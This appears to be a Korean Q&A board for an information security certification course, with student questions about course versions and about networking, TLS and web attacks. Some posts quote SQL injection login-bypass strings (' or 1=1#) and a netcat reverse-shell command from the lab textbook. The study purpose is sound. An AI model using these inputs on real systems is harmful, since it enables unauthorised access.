2021 정보보안(산업)기사 실기대비 강의 [교재별도]
2022 실기가 나왔는데 2021에서는 실기 추가 강의를 결제 해야되는건가요?
그리고 2021 교재랑 2022 교재는 차이가 많이 심한가요? 개요표를 보니 강의 상당히 달라보였는데
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
이미 인증된 기기가 있다고 합니다
아마 전에 강의 때 다른 핸드폰이였는거 같은데요 풀어주세요 ㅜㅜ
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
실기 준비 2022 강의만 들어도 되나요
책은 2022 실기 주문했는데 강의보면 2021,2022 두개 있네요 2022 실기 강의만 들어도 되는건가요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
웹서버 Directory 섹션과 지시자들 이해가 힘들어서 질문드립니다.
안녕하세요. 파일업로드 취약점을 공부 중에 Directory 섹션과 지시자들이 헷갈려서 질문드립니다..
제가 이해한 걸로는 웹서버 설정을 httpd.conf 파일에만 설정하는 것이 아닌,
개별 디렉터리별로도 설정할 수 있는 걸로 이해가 됩니다.
즉, xinetd데몬처럼 공통적으로 적용되는 설정은 xientd.conf에 적용하고, 개별 서비스에 대한 설정은 xientd.d/telnet 같은 개별 설정파일에 설정하는 것처럼
웹서버도 공통적으로 적용되는 설정은 httpd.conf에 적용하고, 이때 개별 페이지(디렉터리)에 대해 설정을 하고 싶을 때
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
2022 실기 강의
2021 지안패스로 듣고 있는데 교재는 2022년도를 구매하면 될까요? 그리고 2022 실기 강의는 들을 수 없는 건가요? 추가된 내용이나 이런건 알 수 없는 건가요?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
아이패드 강의 재생
아이패드에서 강의가 재생안되는데 시청하는 방법이 따로있나요??
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
문의
추가된 부분이 있다면 교제도 새로 사야될까요? 2022에서 추가된 부분만 2021강의자료에 돌려주실 수 없나요?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
.
.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
2022 실기 신강의 들을 수 있는지요?
지안패스로 2021 수강 중입니다. 실기 교재는 새로 구입했는데, 아직 기간이 남은 2021 지안패스 수강자는 2022 신강의 수강시에 할인 있을까요? 할인 혜택 있다면 어떻게 신청하는지요? 이전질문에 비슷한 내용 봤는데 답변 열람이 안되서 질문 재차 드립니다.
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
21년 교재 구매했는데... 이걸로 들어도 되나요?
...22년 교재 이번주에 나왔나보네요 안나오길래 21년 교재 구매했는데.. 이걸로 들어도 되나요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
21년 교재로 22년 강의를 들어도 될까요?
21년 교재를 구매하여 21년 강의를 듣다 22년 강의가 업데이트 되어 22년 강의를 듣고 싶은데 22년 교재를 다시 주문해야 할까요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
안녕하세요
2021 패스 샀는데 정보보안기사 실기 2022강의는 들을 수 없나요? 강의가 많이 달라졌는지도 궁금합니다. 하ㅇ상 감사합니다.
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
CSRF는 XSS의 한 종류라고 봐도 될까요?
시험과 크게 관련은 없지만 단순히 개인 호기심에 질문을 드립니다. Stored XSS 공격은 공격자가 악성script를 "취약한 웹서버의 DB"에 저장시켜서, 해당 DB정보를 요청하는 Client가 악성script가 포함된 DB응답을 받음으로써 Client쪽에서 악성script가 동작하는 원리잖아요? 이때 대표적으로 악성script는 "공격자 서버로 쿠키값(세션ID)을 전송"하는 script구문이 있구요. 그런데 CSRF공격의 경우에는 공격자가 악성script를 "취약한 웹서버의 DB"에 저장시키는 것은 동일하지만, 해당 악성script응답을 Client가 받았을 때, Stored XSS공격과 다르게, "탈취"의 목적이 아닌 "변조"의 목적으로써 Client가 요청한 웹서버로 Client의 권한을 가지고 비밀번호 변경 등을 요청하는 악성script가 동작하게 되는 거잖아요? 그럼 이때 차이점은 단순히 "악성script의 구성 방식"에 있는 것 같고 동작 원리는 "Client요청 -> 웹서버 DB응답 -> Client측에서 악성script가 동작 -> 공격자서버로 쿠키값을 담은 HTTP요청 or 요청한 웹서버로 Client 정보변경을 요청하는 HTTP요청" 이렇게 이해가 되는데 따라서 Client가 악성script를 통해 자신도 모르는 새에 발생하는 HTTP요청이 공격자서버로 가느냐, 정상적인 웹서버로 가느냐 차이점으로 보여서 XSS의 공격 부류 중 하나라 생각이 들기도 합니다..ㅎㅎ 포괄적으로라도 구분지을 수 없이 그냥 아예 별개로 구분해야 하는 게 맞을까요 선생님?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
침해 사고 유형별 시나리오 질문입니다.
선생님 안녕하세요 2021년 실기책 592 페이지 에서 알기사 사이트 NAT IP ( 10.10.10.3) 이 관리자 PC라는 것인데 그러면 동영상 강의에서 표시해주신 관리자 PC IP 192.168.56.20이 NAT 되어 10.10.10.3 으로 변경되서 통신된다는 것일 까요? 10.X.X.X 대역도 사설IP 인것 같아서, 햇갈려서 여쭤봅니다 ㅠ
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
21년 교재로 22년 실기강의 수강해도되나요?
21년 교재로 22년 실기강의 수강해도되나요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
Form SQL인젝션 공격 질문하나 드립니다.
안녕하세요 Form SQL인젝션 공격 중에 궁금한 점이 있어서 질문을 남깁니다. 어느정도 검색을 통해서 해결은 됐지만, 검색해도 모르겠는 부분이 있어서 질문드려요 ' or 1=1# 처럼 후행조건을 주석처리하고, or과 참조건을 넣음으로써 해당 조건절이 무조건 참이되게끔 해서 테이블에 있는 레코드들을 비교했을 때 모두 참이 되게끔 만들잖아요? 그런데 이제 참으로 만드는 조건이 주석을 쓰지 않고도 가능한데 대표적인 예시가 ' or 'a'='a 인 걸로 알려주셨습니다 이때 뒤에 password가 맞지 않으면 안 되는 거 아닌가 싶었는데 DB는 and연산이 우선이 된다고 하길래 이해했습니다. 그런데 여기서 궁금한 점이 있네요 ' or 'a'='a 를 입력한다 했을 때 id='' or 'a'='a' and pass='1234'라고 한다면 id='' or ('a'='a' and pass='1234') 이렇게 묶이게 될거고, 괄호 and연산은 거짓이기 때문에 id='' or 거짓조건 이렇게 될텐데 id='' 이 해당 조건이 참인 조건이 되는 건가요? 제 생각으로는 만약 id=''조건이 참이라면 굳이 or 1=1을 쓰지 않을 테니 절대 참은 아니라 생각하는데 그래서 제가 생각하기에는 ' or 'a'='a 는 모든 레코드에 대해서 참인 조건절을 만들지 못하고 특정한 id필드값에 대해서만 참으로 만드는 거 같은데 맞을까요? 가령 admin' or 'a'='a를 넣게 된다면 id='admin' or 'a'='a' and pass='1234'가 되고, id='admin' or ('a'='a' and pass='1234') 이렇게 and연산부터 묶여서 id='admin' or 거짓조건이 되는데, admin이라는 계정이 해당 테이블에 있다면 그 admin이라는 계정에 대해 참인 조건이 되는 거라 생각이 듭니다 제가 생각하는 부분이 맞을까요? 맞다면 따라서 ' or 'a'='a는 이해를 돕기위한 의미없는 문장인 거 같은데 이것도 맞을까요? ' or 'a'='a를 쓰려면 반드시 계정명을 앞에 입력해서 admin' or 'a'='a 이런식으로 써야하는 거 같다고 생각이 들어서요... 답변 부탁드립니다 ㅠㅠ 직접 MySQL로 실습을 해보니 맞는 것 같습니다. id=''는 필드값이 NULL이라 그런지 Empty 결과가 도출되고 id='admin'처럼 넣으니 후행 패스워드 조건은 무시되네요. 실습결과가 이렇게 나오는데 이론적으로도 당연히 질문한 내용이 맞겠죠 선생님..?ㅠ
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
침해 사고 유형별 시나리오 질문입니다.
선생님 안녕하세요 침해 사고 유형별 시나리오의 공격 시나리오 2021년 실기책 기준 291페이지 main3.php 코드중 REMOTE_ADDR 함수를 써서 알기사 사이트 NAT IP(10.10.10.3) IP 에서 접속 을 하게 되면 iframe 추가 되도록 유도 하는 코드가 있는데요 10.10.10.3(알기사 웹서버 IP) 접근하는 사용자에게 유포지로 리다이렉트 하는 악성스크립트 라고 되어있는데요 , 여기서 10.10.10.3 (알기사 웹서버 IP) 인 이유는 알기사 웹페이지에 iframe 태그 키위쇼핑몰 웹서버(mall.kiwi.99.com)으로 리다이렉트 하는게 담겨져 있어서 최초 경유지인 알기사 웹서버 10.10.10.3 에서 접근 하는 것이 되는 걸까요? 즉 알기사 웹서버(10.10.10.3) -> 키위쇼핑몰 -> 유포지 wow.102.com 에서 키위쇼핑몰 관점에서 REMOTEADDR은 알기사 웹서버 에 포함되어있는 iframe 값 태그 호출을 결국 알기사 웹서버에서 하는 것이기떄문에 10.10.10.3 이 된다 가 맞을까요? 질문2) 실습 과정중 칼리 리눅스 (10.10.10.10 4321 핸들러) 에서 -> 10.10.10.3:51511 로 세션 설정하는 것이 보이는데요 10.10.10.3 은 알기사 웹서버 IP가 아닌가요? 윈도우 XP 에 리버스쉘을 연결 하는게 알기사 웹서버 IP 인지 , 관리자 PC IP (10.10.10.3) 인것인지 모르겠씁니다 ㅜ 강의 에서는 192.168.56.20 이 관리자 PC(Windows XP) 로 되어있는데요.. p.s 게시판 가독성이 너무 안좋아서 txt 파일로도 질문 올립니다!
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
현재 구강의 청강중입니다. 신규강의 나왔을 때 부분적 구매가 가능할까요?
아무래도 학생이다보니 금전적으로 부담이 되는 상황인데 미리 미리 공부해두기 위해 3.7일 신규강의 이전에 강의를 구매해서 공부하고 있습니다. 년도가 바뀌어서 업데이트가 된 줄 알았는데 제가 확인을 못했었나봐요 혹시 업데이트된 인강이 나오면 일부분만 변경되고 나머지 강의들은 똑같을 거 같은데 업데이트 된 부분만 별도의 비용을 지불해서 업데이트시킬 순 없을까요?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
파일 업로드 취약점에 질문 있습니다.
안녕하십니까 질문이 있습니다. 1. content-type 필터링을 통한 방어는 Burp Suite를 통헤 변조가 너무 쉬워 취약합니다. 2. 파일 확장자에 대한 White lIst 대응 코드를 추가 한다고 강의를 듣고 궁금한 점이 있습니다. 질문 : 여기서 해커가 webshell.php 파일을 webshell.jpg 파일로 변경을 하고 업로드를 하면 서버에 업로딩 되는거 아닌가요? 하지만, 해커가 php 파일을 실행하지 못해서 안전하다고 볼 수 있는 건지요??? 질문의 핵심은 파일 확장자를 변경하고 올리는 경우는 서버 사이드에서 파일을 실행하지 못하더라도 Client 로 배포를 해서 악용할 수 있지 않을까라는 궁금점이 있습니다.
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
HTTP GET Flooding 공격에 대해 질문드립니다.
TCP SYN Flooding이나 UDP Flooding 공격들은 DDoS 공격으로 출발지 IP 가 다양한데 HTTP GET Flooding 공격은 다량의 동일한 HTTP GET 요청만 올뿐 출발지 IP는 동일한가요?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
DoS의 Smurf 어택과 DDos의 ICMP 공격의 차이점이 궁금합니다.
Smurf 공격은 출발지 IP를 희생자의 IP로 목적지IP를 증폭 네트워크의 broadcast 주소를 기입하여 서비스 마비를 일으키고 ICMP공격은 다량의 ICMP 패킷을 서버로 전송하여 서비스를 원할하지 않게 하는 공격인데, 공격자 관점에서는 둘다 echo request가 대량으로 발생할텐데 두 가지 공격을 구분할 수 있는 방법이 무엇인가요?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
침해 사고 분석 및 대응의 리버스쉘 질문입니다.
선생님 안녕하세요. 질문있어서 게시글 남깁니다. 책 페이지 540 쪽 리버스쉘을 이용하여 서버->클라이언트로 리버스쉘 접속 명령어 부분설명에서 이해가 안가느데요 nc 10.10.10.10 80 -e /bin/bash 명령어가 잘 이해가 가지 않습니다. 클라이언트에서 nc -lvp 80으로 리스닝 프로세스를 하나 열어 두고 , 서버에서 클라이언트로 접속을 한다 (nc 10.10.10.80) 까지의 명령 어 흐름이고 그 뒤에 나오는 -e /bin/bash 관련 옵션 질문입니다. -e 즉 , exec nc 커넥터의 실행 이미지를 bash 프로세스 실행 이미지로 exec 전이한다 라는 표현을 썻는데.. 질문 1) 이 전이 한다는 표현이 bash 프로세스 실행 프로그램으로 덮어 쓴다로 이해해도될지요? 질문 2) 실행 이미지만 교체되고 nc 커넥터가 오픈한 파일리스트 는 그대로 복제 된다. 여기서 이 복제라는게 도통 잘 모르겠습니다. nc커넥터가 실행되고 생성한 파일리스트에 배쉬프로세스가 전이되고 배쉬프로세스가 생성되면서 기존에 생성한 nc커넥터가 생성한 파일리스트를 배쉬 가 생성한 파일리스트로 복제를 하는것인지.. 복제가 어디서 어디로 되는건지 잘 모르겠습니다.
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
Sequence Number관련 질문드립니다
질문에 대한 답변 감사드립니다 그런데 제가 여쭤보고 싶었던건 ①ACK - ②FIN+ACK - ③ACK - ④FIN+ACK - ⑤ACK에서 두번째 FIN+ACK에 대해서 입니다 제가 이해한건 ①ACK에서 Seq = 7013 / Ack = 7857이였으니 ②패킷의 Seq = 7857이고 ①의Seq=7013이였으니 ②의 Ack는 7014로 줘서 ③의 Seq는 7014가 되야하는것으로 생각했습니다 Sequence Number는 패킷마다 1씩 증가되는 방식이 아닌건가요?? 예를들어 A가 B와 통신할때 A의 ISN이 a이고 B의 ISN이 b일때 a/b a+1/b+1 , a+2/b+2 ... 이런방식으로 증가되는게 아닌건가요?? 아니라면 Sequence Number와 Ackknowledge Number는 언제 증가되는건지 궁금합니다
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
SSL/TLS 질문 하나드립니다.
SSL/TLS 질문 하나드립니다. Handshake프로토콜이 보안파라미터 협상할 때 사용하는 프로토콜이잖아요? 이때 보안파라미터를 협상하기 위해 13단계 완전협상 과정을 거쳐서 협상을 하게 되는데 궁금한 점이 Handshake프로토콜 자체가 13단계로 이루어져있는 건가요? 아니면 13단계 완전협상과정을 수행할 때 Handshake프로토콜을 사용하는 건가요? 개인적으로 프로토콜은 통신규약으로 이용하는 거라 알고있어서 후자가 맞는 거 같은데 또 혹시 몰라서.. 용어적인 면에서 헷갈리게 정리해두면 나중에 지식이 짬뽕이 되기 때문에 질문드립니다 ㅠ 아무래도 후자가 맞겠죠? 보안파라미터(보안설정 정보)를 협상하기 위해 13단계 완전협상과정을 수행하는데, 이때 사용하는 프로토콜이 보안파라미터(보안설정 정보)를 협상하기 위한 Handshake프로토콜을 사용한다. 답변주시면 감사하겠습니다 ( _ _ )
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
일시정지문의
안녕하세요 일시정지 관련해서 문의드렸는데 단과상품의경우 안된다는 답변을받았습니다. 정보보안기사 1년 프리패스구매했는데 해당상품도 일시정지가 안되나요?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
IPSec 터널모드 관련 질문드립니다.
https://cafe.naver.com/algisa/47938 카페에 질문글 올렸습니다. 답변주시면 감사하겠습니다
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
2022년 실기 인강 업데이트
2021년 실기 이론 인강만 구매해서 공부중입니다. 2022년 실기 이론 인강이 나오면 따로 구매해야하나요? 아니면 업데이트가 되는건가요..?!
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
강사님 아직 22년 강의가 업데이트가 안된 건가요??
안녕하세요. 작년 8월쯤 인강을 듣고 시험을 봤는데 아쉽게 떨어져서 다시 실기 인강을 1월중에 구매하여 수강 중인데요 네이버 카페 게시물(https://cafe.naver.com/algisa/47888)을 확인해보니 아직 업데이트가 안된거라고 하더라구요 그런데 저는 지안패스로 구매한 것이 아니라 실기 인강만 구매한 것 같은데 22년 업데이트가 되면 업데이트 부분을 보려면 인강을 다시 구매해야 하나요?? 문득 생각나서 질문드립니다.. 감사합니다.
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
Sequence Number관련 질문드립니다
보안기사 실기 43강 약52분쯤 실습에서 wiershark로 4way-handshaking설명해주실때요 해당 실습 wireshark에서 Sequence Number랑 Acknowledge Number관련해서 이해가좀 안가서요 패킷이 ACK로 마지막패킷 받은후 FIN+ACK - ACK - FIN+ACK - ACK로 4way-handshaking과정이 진행됬는데요 마지막 ACK에 ACK.Number 끝4자리가 7857이라서 FIN+ACK패킷의 Seq.Number가 7857이 됬다는건 이해했는데요 FIN+ACK패킷의 ACK.Number가 7013인것이 이해가가지 않습니다 7014여야 맞는거 아닌가요?? 183page 3way-handshaking설명해주실때 SYN+ACK의 Seq.Number=2000이고 Ack.Number=1001일때 다음 ACK패킷의 Seq.Number=1001이고 Ack.Number=2001로 된다고 설명해주셨었는데 이와같이 생각해보면 위의 4way-handshaking에서도 FIN+ACK패킷의 Seq.Number가 7857이였으니 ACK패킷의 Ack.Number=7014가 맞다고 생각했는데 아닌가요?? Seq.Number와 Ack.Number가 카운트되는 방식이 해깔리네요... 설명좀 부탁드릴께요
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
GARP관련 질문드립니다
GARP를 통해서 IP충돌을 확인한다고 말씀해주셨는데요 말씀해주신 Src IP와 Dst IP가 동일한 경우의 패킷을 받았을때 Src IP도 자기가 가진 IP라면 응답을 안하는게 맞지않나요?? 예를들어 192.168.10.10이라는 IP애 대해서 Src IP : 192.168.10.10 / Dst IP : 192.168.10.10이라는 GARP패킷을 만들어 브로드캐스트로 전송했을때, 192.168.10.10을 중복하여 사용하고있는 Host가 해당패킷을 받는다면 응답할때 목적지가 192.168.10.10이 되는데 이걸 응답을 해주는건가요??
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
DNS서버관련 질문드립니다
일반적으로 기업에서 DNS서버를 운영할때 Recursive DNS서버와 Authoritative DNS서버를 각각 운용하는건가요?? 기업내부 사용자들이 Recursive쿼리를 할때는 Recursive DNS서버로 쿼리를 하고 외부 Recursive DNS서버(ex KT DNS)가 Iterative 쿼리를 할때는 Authoritative DNS서버에 쿼리를 하는 방식이라고 생각하면 될까요?? 이렇게 운용되어서 보안설정시 Authoritative DNS서버에서는 Recursive Query를 막아놓고 Iterative Query만 허용해놓는거라고 생각했는데 맞나요?? 이게 맞다면 DNS서버가 수신한 Query가 Recursive Query인지 Iterative Query인지 구분할수있는 파라미터가 Query패킷내에 있나요??
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
전자필기장
인강에 나오는 전자 필기장? 연습장은 따로 파일이 없는건가요??ㅠㅠ
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
HTTP 응답 분할 취약점 질문입니다.
선생님 안녕하세요. 코로나 조심하시고,, 건강 조심하십시오! 질문을 자주 드리네요. HTTP 응답 분할 취약점에서 궁금한데. Content-Length : 0 으로 설정해서 CRLF (헤더의끝), CRLF(empty line) 로 설정하면 브라우저 입장에서는 더 이상 읽어들일 데이터가 없구나 하고 뒤에 나오는 공격자의 조작된 응답을 읽어 들이지 않는 그런 설정은 없는걸까요? 그리고 응답 헤더에서 Content-Length : 0 과 empty line이 나오면 당연히 응답헤더 끝났구나 라고 브라우저에서 똑똑하게 뒤에 조작된 응답을 안읽어 들일거같은데요 ㅜ 브라우저에서 응답이 2개가 내려오는데, 제가 막연하게 직관으로 느꼇을때 1요청 1응답이 정상적으로 보이는데 1요청 2개의 응답을 읽어드리는게 뭔가 좀 이상해보여서요;
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
2022년 강의는 언제올라오나요?
2022년 강의는 언제올라오나요?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
강사님 두번째 질문입니다.
-> 질문1. 가령 TLS_RSA_WITH_AES_256_CBC_SHA265 이라고 한다면 책에서는 키교환 및 인증 알고리즘으로 RSA를 사용한다고 되어있습니다. 서명이 빠진이유는 DHE 공개 매개변수에 대한 서명이 필요 없기 때문에, 즉 DHE로 키교환을 하는 것이 아니기 때문에 서명이라는 개념이 빠진걸까요? -> 질문2 여기서 서버로부터 받은 RSA 서버 인증서는 CA에서 발급 한걸수도 있고, 자체적으로 생성한 인증서 일수도 있는 걸까요? 더불어 이전에 강의에서 봣을 때 Open SSL이란 프로그램을 이용해서 생성한걸 본거같은데 맞을까요? -> 질문 3. 제가 자꾸 CA개념을 들먹어서 죄송합니다. google.com , naver.com 등 전부 CA에서 발급한 인증서만 봐서요. 그럼 첨부그림의 인증서 RSA(2048bit) 공개키로 Premaster Secret를 공개키로 암호화하여 서버측으로 전달하고 , 서버에서는 강사님이 말씀하신것처럼 별도의 파일 형식으로 서버쪽에 비밀스럽게(안전하게) 보관된 개인키 파일을 이용해서 복호화하여 Premaster+ client Random + serverRandom 조합하여 키블럭을 생성 하는걸 까요? ->질문 4. CA를 통해서 생성된 서버의 개인키, 공개키 여기서 제가 좀 이해가 안가는게 저 공개키라는 것이 CA에서 부여한 웹 서버에 대한 공개키 라는 걸까요? 첨부한 그림의 인증서 공개키 일까요? 클라이언트에서 이게 맞는 올바른 CA에서 발급한 인증서다 라는 걸 체크할 때 는, CA로 올바른 인증서인지 확인 하는 통신? 과정을 잘 모르겠습니다. 제가 뇌피셜로 추측하기로는 공인된 CA에서 algisa.com 에 대한 인증서를 발급해줄게(비용은 지불) 예를들어 베리사인에서 algisa.com 이 웹서버는 공개키로 ‘abcs’를 쓰고 개인키로 ‘1234’써서 인증서 발급 해줄게.클라이언트에서 이게 올바른 인증서다 라는걸 클라이언트에서 검증할때는 베리사인쪽으로 통신 요청 해서 클라이언트 : 베리사인아 이거 인증서 안의 공개키가 ‘abcs’(RSA 2048bits) 인데 이거 맞아? 베리사인 : 어 그거 올바른인증서맞아 . 하고 검증 하는걸까요? ->질문 5.인증서 안에서는 최상위 CA-> 중간 CA- > 대행자 CA 계층적이라고 알려주셔서요, 그럼 위의 그림 인증서에는 계층적으로 발급자 정보가 다 들어가 있는걸까요? 그리고, 모든 전 세계 웹사이트의 서버 인증서의 서버에 대한 공개키 관리는 CA에 관리 되고 있으며, 웹 서버의 공개키는 전부 다 달리 발급되어 인증서 형태로 발급 되는 걸까요.? 가독성을 좋게 드리려고했는데 알기사 게시판 줄 간격 저장이 안되네요 ㅜㅜ 이점 양해 부탁드리겠습니다.
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
SSL/TLS 완전 협상 과정 질문드립니다.
총체적인 난국이.. 서버를 인증한 인증서의 공개키 , 개인키 , 서버에서 생성한 공개키, 인증키가 햇갈립니다.. ㅜ 실기 책 290페이지 (라) Server Key Exchange 메세지에서 DHE를 사용한다면 디피헬만 공개 매개변수를 서명알고리즘 으로 서명하여 서명값과 함께 전달한다. 라고 되어있는데 여기서 서명알고리즘은 DSS가 될것이고 DSS도 상위 기관(CA) 에서 발급한 인증서로 되어있는걸까요? 서명값은 상위기관에서 발급한 인증서의 개인키로 서명하여 인증값이 생성되어 서명하여 클라이언트에 전달하는건가요? 두번째로 완전 협상 Client Key Exchange 메시지에서 RSA 방식 : 프리마스터 생성후 수신한 서버인증서의 공개키를 이용하여 암호화 전송 여기에서 수신한 서버 인증서는 CA가 서명한 인증서의 공개키값을 이용하여 암호화 전송되는 것인지 아니면 서버에서 자체적으로 생성한 공개키값 인것인지 햇갈립니다. 세번째, 책에서 표현하는 서버 인증서의 공개키, 개인키는 CA의 공개키 개인키를 말하는 걸까요 아니면, 서버에서 자체적으로 생성한 인증서안에 들어가 있는 서버의 개인키 공개키를 뜻하는걸까요? 총 정리해서 제가 햇갈리는걸 말씀드리면 CA의 공개키, 개인키 진짜 인증서인지 확인할때만 필요하고. SSL인증서의 진위 여부 파악 을 클라이언트에서 검증이 끝나면, 이후 사전 마스터 비밀 전달할때 사용하는 서버 인증서의 공개키를 이용하여 암호화 되는것은 SSL 인증서 내에 삽입된 웹서버의 공개키를 말하는것인지..? .. 햇갈립니다 ㅠㅠ
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
안녕하세요!!
쌤 마지막 139강이 중간에 잘린 것 같은데... 맞나요...??
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
안녕하세요!
쌤 안녕하세요 RSA의 디지털 서명 부분에서 학습하다 궁금한게 있어서요. 보충자료를 보면, '메시지에 대한 해시값을 송신자의 개인키로 암호화하여 전달, 수신자는 송신자의 공개키로 이를 복호화한 후 이를 검증한다' 라고 쓰여 있는데요. 송신자가 본인의 개인키로 암호화를 한 '내용'이 수신자 입장에서 송신자의 공개키로 복호화....가 된다는 말인가요? 서로 쌍이기 때문에 가능한 거죠?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
강의화면 에서 페이지가 5이상나오지 않아요
예전에 한페이지당 20강 100강이 이후도 강의듣고 이동이 가능했는데 팝업창에서 강의차수가 99강 이후로 이동이 불가능하네요 본화면에서 선택하고 팝업에서는 이동이 불가능 해서 불편합니다.
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
2021년 강의 관련해서 질문입니다.
과정은 2021년으로 되어 있는데 2022년 과정 강의 오픈 전에 임시로 2021년 강의를 오픈 해주시는 건지요? 아니면 2021년으로 계속 지속 되는 건지요? 실기 책을 구매 하려고 하는데 2022년 강의가 새로 나오면 다시 구매 해야 할 것 같아서 어떻게 해야할지 몰라 질문 드립니다.
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
실기관련하여 프로그램을 받을 수 있는 곳이 있나요??
실기관련하여 프로그램을 받을 수 있는 곳이 있나요?? 생각했던 것 보다 강의가 너무 자세하게 해주셔서 잘 듣고 있습니다.
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
모바일 기기 사용 등록 건
22년 .1월 4일로 정보보안 실기 인터넷 강의 수강신청했습니다. (모바일+PC) 모바일 수업 StarPlayer 기 인증된 기기가 있어 학습이 불가능합니다. 기존 : 안드로이드 현재 : ios 사용중 변경 부탁드립니다.
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
강의중 실습 프로그램는 어디에서 찾을 수 있나요 ?
강의중 실습 프로그램은 어디서 찾아요 ?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
쌤 안녕하세요
쌤 안녕하세요 다름이 아니라, 이번에 log4j 사건들에 대해서 혹시 특별 강의 같은 것은 없는지 좀 알고 싶습니다 ㅎㅎ 요새 정보보안을 공부하고 있어서 그런지 관심이 많은데, 쌤 처럼 원리부터 차근차근 설명해주시는 분이 없어서요. ㅠㅠ 항상 좋은 강의 감사합니다.
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
용어가 잘못 표기된게 있는거 같습니다.
정보보안일반관리 부분에 단일예상손실액이 SLA라고 되어있는데 SLE로 되어야 맞는거 같은데 확인 부탁드립니다.
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
개인정보보호법 관련 질문
개인정보의 안전성 확보조치기준?? 기술적,관리적 보호조치기준?? 문의드립니다. 알기사 동영상 강의 참고 자료에 개인정보 안전성 확보조치기준과 기술적, 관리적 보호조치기준 이렇게 두개를 나누어서 정리해 주신 참고자료가 있는데요.. 좀 이해가 안되어서 문의드립니다. 기술적,관리적 보호조치기준이 원래 정보통신망법에 있다가 폐지된걸로 알고 있는데요..? 맞는건가요?? 폐지되고 나서 개인정보보호법으로 기술적,관리적 보호조치기준으로 옮겨가게 된건지요?? 결과적으로 현재 개인정보보호법에 개인정보 안전성 확보조치기준과 기술적,관리적 보호조치기준 모두 포함되어 두개 모두 외워야 하는건가요?? 답변 부탁드립니다..
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
91강 robots.txt 파일 질문
User-agent: * Disallow: / Allow : /$ 네이버에 robots.txt 파일을 열어봤는데 질문이 있습니다. 모든 유저에 대해 모든 접근을 차단한다. 까지는 알겠는데 그 뒤에있는 /$는 어떤 의미인가요 ? 네이버가 들어간 url에대해서는 허용한다는 뜻인가요 ?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
71강 ftp 관련 질문
ftp 111.111.111.111 명령어를 통해 111.111.111.111 서버에 접속하고 그 후에 사용자아이디, 비밀번호를 입력할때 어떤 사용자아이디인지 잘 모르겠습니다. 111.111.111.111이 포함된 네트워크에 존재하는 사용자의 아이디, 비밀번호인가요 ? 아니면 별도의 허가가 있는 명령어를 입력하는 네트워크의 사용자의 아이디, 비밀번호 인가요 ? 감사합니다.
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
69강 어플리케이션 기본 학습의 DNS 캐시 포이즈닝 관련 질문.
323p에 대응책 2번에 보면, recursive 질의를 허용하지 않도록 설정한다고 되어있습니다. recursive나 iterative 질의는 출발지(소스), 목적지 주소와 트랜잭션 id가 같을텐데, recursive dns 서버가 authoritative 서버에서 오는 iterative 질의와 공격자의 recursive 질의를 구분 할 수 있는 방법이 있나요 ? 감사합니다
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
7강에서 c파일 컴파일 시 결과값 문의
fork() 함수 반환 시 결과값이 1차적으로 자식 프로세스의 PID로 알고 있습니다. c언어 소스코드 상 pid=fork(); 의 부분에서 pid 는 양수로 생각 됩니다. pid가 양수이기 때문에 if(pid > 0)의 조건문이 먼저 실행되야 맞는 사항으로 생각되는데 else 조건문이 먼저 실행되는 이유를 문의드립니다.
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
정보보안산업기사 실기 준비중입니다.
정보보안기사에만 나오는 강의는 건너뛰어서 강의를 듣고싶습니다. 몇강몇강이 정보보안기사에만 나오는 강의인가요?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
16강 슈퍼데몬 서비스별 설정파일 cps 관련 질문
예시로 cps 50 10 이면 초당 50개의 연결만 제한 하고, 이를 넘는 연결 요청이 올 경우 10초간 일시중지 후 서비스를 개시한다. 라고 되있는데, 결국 초과로 요청된 연결 요청은 해결이 되지 않은것 아닌가요 ? 일시중지를 함으로써 어떤 동작이 되는 것인지 잘 모르겠습니다. 그냥 단순히 연결요청을 전부 거절하고 다시 사용자의 연결요청을 받는것 인가요 ?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
강의 자료 문의
